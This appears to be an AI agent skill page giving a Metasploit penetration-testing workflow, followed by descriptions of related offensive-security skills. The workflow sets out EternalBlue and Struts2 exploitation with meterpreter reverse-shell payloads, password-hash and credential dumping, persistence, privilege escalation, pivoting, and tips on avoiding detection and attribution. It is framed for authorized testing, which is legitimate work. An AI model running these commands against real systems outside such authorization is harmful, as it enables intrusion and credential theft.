pentest-metasploit
Penetration testing framework for exploit development, vulnerability validation, and authorized security assessments using Metasploit Framework. Use when: (1) Validating vulnerabilities in authorized security assessments, (2) Demonstrating exploit impact for security research, (3) Testing defensive controls in controlled environments, (4) Conducting authorized penetration tests with proper scoping and authorization, (5) Developing post-exploitation workflows for red team operations.
What this skill does
# Metasploit Framework Penetration Testing ## Overview Metasploit Framework is the industry-standard platform for penetration testing, vulnerability validation, and exploit development. This skill provides structured workflows for authorized offensive security operations including exploitation, post-exploitation, and payload delivery. **IMPORTANT**: This skill is for AUTHORIZED security testing only. Always ensure proper authorization, scoping documents, and legal compliance before conducting penetration testing activities. ## Quick Start Initialize Metasploit console and verify database connectivity: ```bash # Start PostgreSQL database (required for workspace management) sudo systemctl start postgresql # Initialize Metasploit database msfdb init # Launch Metasploit console msfconsole # Verify database connection msf6 > db_status ``` ## Core Workflow ### Penetration Testing Workflow Progress: [ ] 1. Verify authorization and scope [ ] 2. Configure workspace and target enumeration [ ] 3. Identify and select appropriate exploits [ ] 4. Configure payload and exploit options [ ] 5. Execute exploitation with proper documentation [ ] 6. Conduct post-exploitation activities (if authorized) [ ] 7. Document findings with impact assessment [ ] 8. Clean up artifacts and sessions Work through each step systematically. Check off completed items. ### 1. Authorization Verification **CRITICAL**: Before any testing activities: - Confirm written authorization from asset owner - Review scope document for in-scope targets - Verify IP ranges and systems authorized for testing - Confirm allowed testing windows and blackout periods - Document point of contact for emergency escalation ### 2. Workspace Setup Create isolated workspace for engagement: ```bash msf6 > workspace -a <engagement-name> msf6 > workspace <engagement-name> msf6 > db_nmap -sV -sC -O <target-ip-range> ``` Import existing reconnaissance data: ```bash msf6 > db_import /path/to/nmap-scan.xml msf6 > hosts msf6 > services ``` ### 3. Exploit Selection Search for relevant exploits based on enumerated services: ```bash msf6 > search type:exploit platform:windows <service-name> msf6 > search cve:<cve-id> msf6 > search eternalblue ``` Evaluate exploit suitability: - **Reliability Ranking**: Excellent > Great > Good > Normal > Average - **Stability**: Check crash potential - **Target Compatibility**: Verify OS version and architecture - **Required Credentials**: Determine if authentication needed ### 4. Exploit Configuration Configure selected exploit module: ```bash msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > show options msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target-ip> msf6 exploit(windows/smb/ms17_010_eternalblue) > set RPORT 445 # Configure payload msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_https msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <listener-ip> msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 443 # Validate configuration msf6 exploit(windows/smb/ms17_010_eternalblue) > show options msf6 exploit(windows/smb/ms17_010_eternalblue) > check ``` ### 5. Exploitation Execution Execute exploit with logging: ```bash # Enable logging msf6 exploit(windows/smb/ms17_010_eternalblue) > spool /path/to/logs/engagement-<date>.log # Run exploit msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit # Or run without auto-interaction msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j ``` **Exploitation outcomes**: - **Session opened**: Successful exploitation, proceed to post-exploitation - **Exploit failed**: Review target compatibility, try alternative exploits - **Target not vulnerable**: Document finding, move to next target - **Service crash**: Document stability issue, attempt service restoration if authorized ### 6. Post-Exploitation (Authorized Activities Only) Once session established, conduct authorized post-exploitation: ```bash # List active sessions msf6 > sessions -l # Interact with session msf6 > sessions -i <session-id> # Gather system information meterpreter > sysinfo meterpreter > getuid meterpreter > getprivs # Check network configuration meterpreter > ipconfig meterpreter > route # Enumerate running processes meterpreter > ps # Check security controls meterpreter > run post/windows/gather/enum_av_excluded meterpreter > run post/windows/gather/enum_logged_on_users ``` **Common post-exploitation modules**: - `post/windows/gather/hashdump` - Extract password hashes (requires SYSTEM privileges) - `post/multi/recon/local_exploit_suggester` - Identify privilege escalation opportunities - `post/windows/gather/credentials/credential_collector` - Gather stored credentials - `post/windows/manage/persistence_exe` - Establish persistence (if explicitly authorized) ### 7. Privilege Escalation If authorized for privilege escalation: ```bash # Identify escalation vectors meterpreter > run post/multi/recon/local_exploit_suggester # Migrate to stable process meterpreter > ps meterpreter > migrate <stable-process-pid> # Attempt privilege escalation meterpreter > getsystem meterpreter > getuid ``` Manual privilege escalation workflow: 1. Background current session: `background` 2. Select escalation module: `use exploit/windows/local/<escalation-module>` 3. Set session: `set SESSION <session-id>` 4. Run exploit: `exploit` ### 8. Lateral Movement For authorized internal penetration tests: ```bash # Enumerate network meterpreter > run post/windows/gather/arp_scanner RHOSTS=<internal-subnet> meterpreter > run auxiliary/scanner/smb/smb_version # Pivot through compromised host meterpreter > run autoroute -s <internal-subnet>/24 # Use compromised host as proxy msf6 > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080 msf6 auxiliary(server/socks_proxy) > run -j ``` Configure proxychains for pivoting: ```bash # Edit /etc/proxychains4.conf socks4 127.0.0.1 1080 # Run tools through pivot proxychains nmap -sT -Pn <internal-target> ``` ## Security Considerations ### Authorization & Legal Compliance - **Written Authorization**: Maintain signed penetration testing agreement - **Scope Adherence**: Only test explicitly authorized systems and networks - **Data Protection**: Handle discovered data per engagement rules of engagement - **Incident Response**: Immediately report critical findings per escalation procedures - **Evidence Handling**: Maintain chain of custody for forensic evidence ### Operational Security - **Callback Infrastructure**: Use dedicated, authorized callback servers - **Attribution Prevention**: Avoid personal infrastructure or identifiable indicators - **Traffic Encryption**: Use encrypted payloads (HTTPS, DNS tunneling) - **Artifact Cleanup**: Remove exploitation artifacts post-engagement - **Session Management**: Close sessions cleanly to avoid detection alerts ### Audit Logging Log all penetration testing activities: - Timestamp of exploitation attempts - Source and destination systems - Exploit modules and payloads used - Commands executed in sessions - Data accessed or exfiltrated - Privilege escalation attempts - Lateral movement actions ### Compliance - **PTES**: Penetration Testing Execution Standard compliance - **OWASP**: Alignment with application security testing methodology - **MITRE ATT&CK**: Map TTPs to ATT&CK framework for threat modeling - **PCI-DSS 11.3**: Penetration testing for payment card environments - **SOC2**: Security testing for service organization controls ## Common Patterns ### Pattern 1: Web Application Exploitation ```bash msf6 > use exploit/multi/http/apache_struts2_content_type_ognl msf6 exploit(...) > set RHOSTS <web-server> msf6 exploit(...) > set TARGETURI /vulnerable-app msf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp msf6 exploit(...) > exploit ``` ### Pattern 2: Database Server Exploitation
Related in offsec
privesc-linpeas
IncludedLinux privilege escalation enumeration and attack surface analysis using LinPEAS (Linux Privilege Escalation Awesome Script). Automates post-exploitation discovery of escalation vectors, misconfigurations, and credential exposure on Linux targets. Use when: (1) Enumerating privilege escalation vectors after initial access on a Linux system, (2) Identifying SUID/SGID binaries, sudo misconfigurations, and capability abuses, (3) Hunting for credentials in config files, history, and logs, (4) Detecting container breakout opportunities and writable service files, (5) Mapping kernel exploits and CVE exposure for a target system, (6) Conducting authorized CTF, red team, or penetration test post-exploitation phases.
analysis-tshark
IncludedNetwork protocol analyzer and packet capture tool for traffic analysis, security investigations, and forensic examination using Wireshark's command-line interface. Use when: (1) Analyzing network traffic for security incidents and malware detection, (2) Capturing and filtering packets for forensic analysis, (3) Extracting credentials and sensitive data from network captures, (4) Investigating network anomalies and attack patterns, (5) Validating encryption and security controls, (6) Performing protocol analysis for vulnerability research.
analysis-tshark
IncludedNetwork protocol analyzer and packet capture tool for traffic analysis, security investigations, and forensic examination using Wireshark's command-line interface. Use when: (1) Analyzing network traffic for security incidents and malware detection, (2) Capturing and filtering packets for forensic analysis, (3) Extracting credentials and sensitive data from network captures, (4) Investigating network anomalies and attack patterns, (5) Validating encryption and security controls, (6) Performing protocol analysis for vulnerability research.
crack-hashcat
IncludedAdvanced password recovery and hash cracking tool supporting multiple algorithms and attack modes. Use when: (1) Performing authorized password auditing and security assessments, (2) Recovering passwords from captured hashes in forensic investigations, (3) Testing password policy strength and complexity, (4) Validating encryption implementations, (5) Conducting security research on cryptographic hash functions, (6) Demonstrating password weakness in penetration testing reports.
network-netcat
IncludedNetwork utility for reading and writing data across TCP/UDP connections, port scanning, file transfers, and backdoor communication channels. Use when: (1) Testing network connectivity and port availability, (2) Creating reverse shells and bind shells for authorized penetration testing, (3) Transferring files between systems in restricted environments, (4) Banner grabbing and service enumeration, (5) Establishing covert communication channels, (6) Testing firewall rules and network segmentation.
pentest-metasploit
IncludedPenetration testing framework for exploit development, vulnerability validation, and authorized security assessments using Metasploit Framework. Use when: (1) Validating vulnerabilities in authorized security assessments, (2) Demonstrating exploit impact for security research, (3) Testing defensive controls in controlled environments, (4) Conducting authorized penetration tests with proper scoping and authorization, (5) Developing post-exploitation workflows for red team operations.